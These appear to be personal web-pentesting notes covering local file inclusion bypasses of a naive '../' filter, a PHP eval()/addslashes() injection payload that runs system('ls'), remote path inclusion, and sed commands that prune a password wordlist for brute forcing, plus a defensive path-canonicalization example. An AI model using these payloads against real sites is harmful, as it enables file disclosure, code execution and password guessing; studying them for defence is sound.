
Web

Disclaimer: These are my personal notes, published "as-is" without warranty or guarantee of any kind. Use at your own risk. Licensed CC BY-NC-SA 4.0.

Local file inclusion #

  • A find/replace that only strips the literal ../ can be bypassed with ..//
  • e.g. /uploads/%2e%2e/%2fsys/class/net/eth0/address or /uploads/..//sys/class/net/eth0/address
  • Resolve a network path: http://host.tld/?page=//11.22.33.44/ (via @OsandaMalith)
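Added example (my own, not part of the original notes): the defensive check that the bullets argue for. Instead of searching the raw request path for the literal "../", percent-decode, collapse repeated slashes and resolve dot segments, then test whether the result still sits under the intended directory. The sample paths are constructed from the two bullets above; the base directory /uploads is assumed.

```python
import posixpath
from urllib.parse import unquote

def canonicalize(raw_path: str, max_rounds: int = 3) -> str:
    """Percent-decode until stable (bounded), then collapse // and resolve ./ and ../."""
    path = raw_path
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    # normpath removes empty segments ("//") and resolves "." and "..";
    # forcing a single leading "/" stops it walking above the root.
    return posixpath.normpath("/" + path.lstrip("/"))

def escapes_base(raw_path: str, base: str) -> bool:
    """True when the canonical path lies outside base (assumed to be /uploads here)."""
    canon = canonicalize(raw_path)
    base = posixpath.normpath(base)
    return not (canon == base or canon.startswith(base + "/"))

def naive_check(raw_path: str) -> bool:
    """The literal-substring filter the note says is bypassable: matches only '../'."""
    return "../" in raw_path

# Constructed sample request paths; the last two are the ones from the note.
SAMPLES = [
    "/uploads/avatar.png",
    "/uploads/./avatar.png",
    "/uploads/%2e%2e/%2fsys/class/net/eth0/address",
    "/uploads/..//sys/class/net/eth0/address",
]

def classify(samples=SAMPLES, base="/uploads"):
    """Return (raw_path, literal-filter hit, escapes base after canonicalization)."""
    return [(p, naive_check(p), escapes_base(p, base)) for p in samples]

if __name__ == "__main__":
    for raw, literal_hit, escapes in classify():
        print(f"{raw:48} literal '../': {literal_hit!s:5} "
              f"canonical: {canonicalize(raw):30} escapes /uploads: {escapes}")
```

The encoded variant never contains the literal "../", so the substring filter passes it, while both variants canonicalize to the same path under /sys and fail the base-directory check.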

PHP - Bypass eval() with addslashes() #

Where a value from a URL is passed through eval() after addslashes(). addslashes() only escapes quotes, backslashes and NUL bytes, so ${...} interpolation inside a double-quoted string is still evaluated.

PoC: ?str=${eval($_GET[1])}&1=phpinfo();

For example: GET /?format=${eval($_GET[1])}&1=system('ls');

https://www.programmersought.com/article/30723400042/

Command injection #

Characters #

See https://academy.hackthebox.com/module/109/section/1032

Resources #

File upload #

See https://academy.hackthebox.com/module/136/section/1291

Brute forcing #

If we know the password policy, prune the wordlist to candidates that satisfy it:

sed -ri '/^.{,7}$/d' words.txt # remove words shorter than 8 characters
sed -ri '/[!-/:-@\[-`\{-~]+/!d' words.txt # remove words with no special characters
sed -ri '/[0-9]+/!d' words.txt # remove words with no digits